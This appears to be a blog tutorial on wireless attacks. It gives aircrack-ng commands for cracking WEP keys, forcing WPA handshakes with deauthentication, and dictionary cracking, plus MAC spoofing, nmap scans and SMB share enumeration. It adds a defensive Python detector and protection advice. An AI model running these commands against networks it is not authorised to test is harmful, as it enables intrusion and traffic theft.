It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.
I will use Ubuntu (Gnome desktop) under the root account with some non-default tools:
apt-get install nmap macchanger
You will need to install aircrack-ng and the adapter drivers from source to get the latest version.
I got an Edimax EW-7318USg for ~$30, one of the recommended devices.
Placeholders I will use with the aircrack-ng suite:
AP-MAC - MAC address of access point (AP), examples:
AP-CH - channel AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of a client already associated with the AP (needed for the deauth attack), ex: 012345abcdef
The interface I will use is rausb0.
Simple WEP Crack
Put the card into monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0
And start scanning
airodump-ng rausb0
Pick the target network and test whether we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
Test on all bitrates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0
Start capturing IVs for the target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0
Fake authentication with the access point, otherwise it will drop our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or make the access point rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes long
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can be used to replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use a ready-to-send packet
aireplay-ng -2 -r arp-request rausb0
Once you have 40K to 80K data packets, try to crack the WEP key
PTW method (the default in aircrack-ng 1.0; selected with -z in the 0.9.x builds)
aircrack-ng -b AP-MAC output*.cap
FMS/KoreK method (aircrack-ng 1.0 and later)
aircrack-ng -K -b AP-MAC output*.cap
When no wireless clients exist
Fragmentation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0
You will get a file like "fragment-0203-180343.xor" for the next step.
Use packetforge-ng to create an ARP packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request
You can inspect created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), decrypt the packet with your own WEP key and check that it is correct (WEP-KEY is a placeholder for that key)
airdecap-ng -e AP-NAM -w WEP-KEY arp-request
View the decrypted packet
tcpdump -n -r arp-request-dec
How to Crack WPA/WPA2
The only way is to capture the 4-way authentication handshake
Deauthenticate a connected client once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0
For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap
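The IV harvest above (airodump-ng collecting 40K-80K data packets) and the deauth bursts used to force a WPA handshake both leave obvious traces in the air. The following is an added example written for this page, not aircrack-ng code and not part of the original post: it parses raw 802.11 frames from a monitor-mode capture, reports every BSSID still carrying WEP data (and how many distinct IVs have gone by), and alerts when more than a handful of deauthentication frames hit the same AP/client pair within a second. The frames, timestamps and MAC addresses are constructed inline; it assumes the radiotap header has already been stripped.

```python
"""Offline triage of monitor-mode 802.11 frames: flags deauth bursts and
WEP traffic.  Added example, not from the original post or aircrack-ng.
Assumes raw 802.11 frames without a radiotap prefix, timestamps in seconds,
and constructed MAC addresses."""
import struct
from collections import Counter, defaultdict

# Frame Control byte 0: bits 2-3 = type, bits 4-7 = subtype; byte 1 = flags
TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_DEAUTH = 12
FLAG_TO_DS, FLAG_FROM_DS, FLAG_PROTECTED = 0x01, 0x02, 0x40
EXT_IV = 0x20   # set in the key-index byte for TKIP/CCMP, clear for WEP

def mac(s):
    """'00:11:22:33:44:55' -> 6 raw bytes."""
    return bytes.fromhex(s.replace(":", ""))

def parse_frame(raw):
    """Decode the 24-byte 802.11 MAC header shared by management and data frames."""
    if len(raw) < 24:
        return None
    fc0, fc1 = raw[0], raw[1]
    a1, a2, a3 = raw[4:10], raw[10:16], raw[16:22]
    to_ds, from_ds = fc1 & FLAG_TO_DS, fc1 & FLAG_FROM_DS
    # Which address field carries the BSSID depends on the ToDS/FromDS flags
    if to_ds and not from_ds:
        bssid = a1
    elif from_ds and not to_ds:
        bssid = a2
    else:
        bssid = a3
    return {"type": (fc0 >> 2) & 0x3, "subtype": fc0 >> 4,
            "protected": bool(fc1 & FLAG_PROTECTED),
            "addr1": a1, "addr2": a2, "bssid": bssid, "body": raw[24:]}

def detect_deauth_bursts(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp, raw_frame).  Returns {(bssid, client): peak}
    for every AP/client pair that saw more than `threshold` deauthentication
    frames inside any `window`-second span.  A real AP rarely deauths the same
    client repeatedly within a second; a deauth attack does exactly that."""
    recent, peaks = defaultdict(list), {}
    for ts, raw in sorted(frames, key=lambda fr: fr[0]):
        f = parse_frame(raw)
        if not f or f["type"] != TYPE_MGMT or f["subtype"] != SUBTYPE_DEAUTH:
            continue
        # Spoofed deauths may claim to come from the AP or the client; key on the pair
        client = f["addr1"] if f["addr1"] != f["bssid"] else f["addr2"]
        key = (f["bssid"].hex(":"), client.hex(":"))
        recent[key] = [t for t in recent[key] if ts - t <= window] + [ts]
        if len(recent[key]) > threshold:
            peaks[key] = max(peaks.get(key, 0), len(recent[key]))
    return peaks

def wep_iv_report(frames):
    """Per BSSID: WEP data frames seen, distinct 24-bit IVs, and IVs reused.
    Any WEP traffic at all is the finding; the counts show how far an IV
    harvest (the 40K-80K packets mentioned above) has progressed."""
    per_bss = defaultdict(Counter)
    for _, raw in frames:
        f = parse_frame(raw)
        if not f or f["type"] != TYPE_DATA or not f["protected"] or len(f["body"]) < 4:
            continue
        iv, keyid = f["body"][:3], f["body"][3]
        if keyid & EXT_IV:        # TKIP/CCMP, not WEP
            continue
        per_bss[f["bssid"].hex(":")][iv] += 1
    return {bss: {"frames": sum(c.values()), "distinct_ivs": len(c),
                  "reused_ivs": sum(1 for n in c.values() if n > 1)}
            for bss, c in per_bss.items()}

# --- constructed sample capture -------------------------------------------
AP, CLIENT = "00:11:22:33:44:55", "01:23:45:ab:cd:ef"   # constructed addresses

def build_frame(fc0, fc1, a1, a2, a3, body=b""):
    """Minimal 802.11 frame: frame control, duration, 3 addresses, seq ctrl, body."""
    return (struct.pack("<BBH", fc0, fc1, 0) + mac(a1) + mac(a2) + mac(a3)
            + struct.pack("<H", 0) + body)

def sample_capture():
    frames = []
    # Ten WEP data frames AP->client: IVs 1..8, then IVs 1 and 2 reused
    for i, iv in enumerate(list(range(1, 9)) + [1, 2]):
        body = iv.to_bytes(3, "big") + b"\x00" + b"\x55" * 20   # IV, key index 0, ciphertext placeholder
        frames.append((i * 0.1, build_frame(0x08, FLAG_FROM_DS | FLAG_PROTECTED, CLIENT, AP, AP, body)))
    # One CCMP frame (Ext IV bit set) that must not be counted as WEP
    frames.append((1.5, build_frame(0x08, FLAG_FROM_DS | FLAG_PROTECTED, CLIENT, AP, AP,
                                    b"\x00\x00\x00" + bytes([EXT_IV]) + b"\x00" * 20)))
    # One ordinary deauth at t=2.0, then a burst of eight within 0.14 s at t=5.0
    def deauth(ts):
        return ts, build_frame(0xC0, 0x00, CLIENT, AP, AP, struct.pack("<H", 7))  # reason code 7
    frames.append(deauth(2.0))
    frames += [deauth(5.0 + k * 0.02) for k in range(8)]
    return frames

if __name__ == "__main__":
    cap = sample_capture()
    print("deauth bursts:", detect_deauth_bursts(cap))
    print("WEP report:", wep_iv_report(cap))
```

Feed it real frames (read from a .cap with any pcap library, radiotap header removed) while you follow the steps above against your own AP: the WEP report should drop to nothing once the AP is moved to WPA/WPA2, and the deauth detector should fire only during your own aireplay-ng -0 test. Both checks are what a wireless IDS looks for, so they are also a good sanity test of whatever monitoring you run on the network.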
Other useful stuff
MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0
But it is easier with macchanger
macchanger --mac 00:11:22:33:44:55
Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M
Scan network for devices
nmap -sP 10.0.0.1-255
Scan services on specific device
nmap 10.0.0.16
nmap -PN 10.0.0.16
Windows information and shares (if open)
smbclient -L \\10.0.0.16
smbclient -L \\10.0.0.16 -U Guest -W workgroup
Kernel modules control
lsmod | grep 73
modprobe rt73
Trace packets on the interface with
tcpdump -n -vvv -s0 -e -i rausb0
Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager
Links
aircrack-ng tutorials and FAQ
Latest nmap
So, to protect your wireless network: don't use WEP; use WPA/WPA2 with a long and complicated passphrase; MAC filtering only slows an attacker down until he sees the MAC of one of the authenticated clients; hiding the SSID doesn't help at all.
UPD: Good news from the aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service